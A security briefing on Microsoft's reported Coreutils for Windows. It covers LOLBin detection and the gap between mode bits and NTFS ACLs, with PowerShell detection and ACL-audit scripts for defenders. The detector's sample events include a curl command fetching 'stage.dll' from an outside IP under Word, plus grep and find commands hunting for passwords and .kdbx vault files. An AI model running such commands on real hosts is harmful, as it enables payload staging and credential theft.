Microsoft's Coreutils project brings Linux commands to Windows
At Build 2026 Microsoft announced Coreutils for Windows: native, Microsoft-signed builds of familiar Unix command-line tools (grep, find, curl, chmod, and others) shipped as part of the Windows platform. Two consequences matter to defenders. First, the set of living-off-the-land binaries (LOLBins) present on a default install grows. Second, Unix permission semantics (mode bits set through chmod and chown) now sit on top of NTFS ACLs, which invites confusion about which layer actually controls access. Detection baselines should be updated as soon as the binaries reach managed hosts.
Because the binaries are Microsoft-signed, AV/EDR and reputation-based controls will trust them by default, and adversaries will fold them into LOLBAS-style post-exploitation faster than most blue teams update their Sigma rules. Hunt for coreutils processes spawned by unusual parents (Office applications, browsers, other LOLBins), and check that your LOLBAS/LOLBin detection coverage explicitly enumerates the new binary paths; the install location is not confirmed here, with C:\Windows\System32\coreutils\ the likely candidate until verified on a host that has the update. Note that curl.exe has already shipped in System32 since Windows 10 1803, so any curl-specific detections you have are a starting point rather than a gap.
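The parent-process hunt described above, written out as a PowerShell check. This is an added example, not code from the original briefing or from Microsoft; the install directory is the briefing's own guess, the tool list is the one the briefing names, and the suspicious-parent list is an illustrative starting set, all of which you should adjust once you have a host with the update. The sample events are constructed Sysmon Event ID 1 records so the logic runs offline; the converter at the end is for live use against the Sysmon log.

```powershell
# Added example (not from the original briefing, not Microsoft's tooling): flag
# Coreutils for Windows launches from parents that should never spawn them.
# Assumptions: $CoreutilsDir is the briefing's guess at the install path and
# $CoreutilNames is the briefing's tool list; confirm both on an updated host.
$CoreutilsDir  = 'C:\Windows\System32\coreutils\'
$CoreutilNames = @('grep.exe', 'find.exe', 'curl.exe', 'chmod.exe', 'chown.exe', 'sed.exe')

# Parents that have no business invoking a shell utility on an end-user host.
$SuspiciousParents = @(
    'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe',   # Office
    'chrome.exe', 'msedge.exe', 'firefox.exe',                   # browsers
    'mshta.exe', 'wscript.exe', 'cscript.exe', 'rundll32.exe',   # classic LOLBins
    'regsvr32.exe', 'msbuild.exe'
)

function Find-SuspiciousCoreutilLaunch {
    param(
        # Records carrying Image, ParentImage and CommandLine (Sysmon EID 1 field names).
        [Parameter(Mandatory)] [object[]] $Events
    )
    foreach ($e in $Events) {
        $image = [System.IO.Path]::GetFileName($e.Image).ToLowerInvariant()
        if ($CoreutilNames -notcontains $image) { continue }

        $parent    = [System.IO.Path]::GetFileName($e.ParentImage).ToLowerInvariant()
        $badParent = $SuspiciousParents -contains $parent
        $offPath   = -not $e.Image.StartsWith($CoreutilsDir, [System.StringComparison]::OrdinalIgnoreCase)

        $reasons = @()
        if ($badParent) { $reasons += "spawned by $parent (Office/browser/LOLBin)" }
        if ($offPath)   { $reasons += "runs outside $CoreutilsDir (third-party copy, pre-existing System32 curl.exe, or a renamed binary)" }
        if ($reasons.Count -eq 0) { continue }   # expected directory and ordinary parent: not interesting

        $severity = if ($badParent) { 'High' } else { 'Medium' }
        [pscustomobject]@{
            Severity    = $severity
            Image       = $e.Image
            Parent      = $e.ParentImage
            CommandLine = $e.CommandLine
            Reason      = ($reasons -join '; ')
        }
    }
}

# Constructed sample records standing in for Sysmon Event ID 1 data.
$sample = @(
    [pscustomobject]@{ Image = 'C:\Windows\System32\coreutils\grep.exe'; ParentImage = 'C:\Windows\System32\cmd.exe'; CommandLine = 'grep -ri password C:\Users\alice\Documents' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\coreutils\curl.exe'; ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'; CommandLine = 'curl -s -o C:\Users\Public\stage.dll https://203.0.113.5/stage.dll' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\coreutils\find.exe'; ParentImage = 'C:\Program Files\Google\Chrome\Application\chrome.exe'; CommandLine = 'find C:\Users -name *.kdbx' }
    [pscustomobject]@{ Image = 'C:\Program Files\Git\usr\bin\grep.exe'; ParentImage = 'C:\Windows\explorer.exe'; CommandLine = 'grep -n TODO main.c' }
)
Find-SuspiciousCoreutilLaunch -Events $sample | Format-Table -AutoSize
# Expected: cmd.exe/grep is skipped; WINWORD/curl and chrome/find are High; Git grep is Medium.

# Live use when Sysmon is installed: map Event ID 1 records into the shape above.
function ConvertFrom-SysmonProcessCreate {
    param([Parameter(Mandatory, ValueFromPipeline)] [System.Diagnostics.Eventing.Reader.EventRecord] $Record)
    process {
        $field = @{}
        foreach ($d in ([xml] $Record.ToXml()).Event.EventData.Data) { $field[$d.Name] = $d.'#text' }
        [pscustomobject]@{ Image = $field['Image']; ParentImage = $field['ParentImage']; CommandLine = $field['CommandLine'] }
    }
}
# $live = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } |
#             ConvertFrom-SysmonProcessCreate
# Find-SuspiciousCoreutilLaunch -Events $live
```

The off-path check is deliberately rated lower than the bad-parent check: Git for Windows, WSL interop and the existing System32 curl.exe all legitimately put same-named binaries elsewhere, so that signal needs per-host tuning, while an Office or browser process spawning any of these tools rarely does.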
Microsoft announced native Coreutils binaries for Windows at Build 2026, bringing tools such as grep, find, chmod, curl, and sed as first-party, Microsoft-signed executables. That signature carries implicit OS trust: application allowlisting policies that admit anything Microsoft-signed (for example WDAC policies built on the Microsoft publisher rule) will accept them automatically, while policies keyed on file path or hash will not see them until they are updated. Either way, controls that only flag unsigned or third-party tooling will not flag these.
Shipping chmod and chown on Windows puts two permission models on the same files. NTFS ACLs are what the kernel enforces; the mode bits these tools present are a view that has to be mapped onto, or derived from, those ACLs, and any mismatch between the two can mislead tooling that reads only one layer. A file that looks locked down in mode-bit terms may still carry a permissive ACE, or a restrictive ACL may be hidden behind loose-looking mode bits, either masking privilege escalation paths (such as world-writable files in privileged locations) or producing false alarms. Audits should read the ACL layer directly rather than trusting a mode-bit summary.
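A direct audit of the layer the OS enforces, as an added PowerShell example that is not part of the original briefing and not Microsoft's tooling. It does not depend on how Microsoft's chmod maps mode bits onto ACLs: it enumerates the NTFS ACEs on a tree and reports any write-capable grant to a broad principal, plus the NTFS owner, so the result can be compared with whatever the mode-bit tools report for the same files. The principal names assume an English build of Windows; localized builds need the local names.

```powershell
# Added example (not from the original briefing, not Microsoft's tooling): list the
# NTFS ACEs the kernel actually enforces and flag write grants to broad principals,
# independent of whatever mode bits chmod-style tools show for the same files.
# Assumption: English well-known account names; adjust for localized builds.
$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these specific rights lets the principal change content, permissions or
# ownership. Modify and FullControl include WriteData, so the mask catches them too.
$WriteBits = [System.Security.AccessControl.FileSystemRights] 'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'

# Inherit-only ACEs on directories often carry generic rights instead of specific
# ones and print as a raw number; fold GENERIC_WRITE and GENERIC_ALL into the mask.
$WriteMask = [int] $WriteBits -bor 0x40000000 -bor 0x10000000

function Get-BroadWriteGrant {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [switch] $Recurse
    )
    $items = @(Get-Item -LiteralPath $Path)
    if ($Recurse) {
        $items += Get-ChildItem -LiteralPath $Path -Recurse -Force -ErrorAction SilentlyContinue
    }
    foreach ($item in $items) {
        $acl = Get-Acl -LiteralPath $item.FullName -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (([int] $ace.FileSystemRights -band $WriteMask) -eq 0) { continue }
            [pscustomobject]@{
                Path      = $item.FullName
                Owner     = $acl.Owner
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

# Usage: run against a tree you care about and compare with the mode-bit view of
# the same files; any file that appears here but looks read-only to chmod-style
# tooling is exactly the mismatch the briefing warns about.
Get-BroadWriteGrant -Path 'C:\inetpub\wwwroot' -Recurse | Format-Table -AutoSize
```

Keeping the owner in the output matters once chown is in the picture: on NTFS the owner can always rewrite the DACL, so a file owned by a low-privilege account in a privileged location is a write path even when no ACE grants write.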
Red teams will treat this as an immediate force multiplier: familiar Unix tooling available natively removes the operational friction of dropping custom binaries, and each drop avoided is one fewer artifact for forensics. Blue teams should baseline the expected parent-child process trees for these binaries on day one, but baseline per host role. On developer and build machines, grep, find and sed will run constantly from terminals, IDEs and build tasks, so deviation from baseline is a strong signal on end-user hosts and a tuning exercise everywhere else.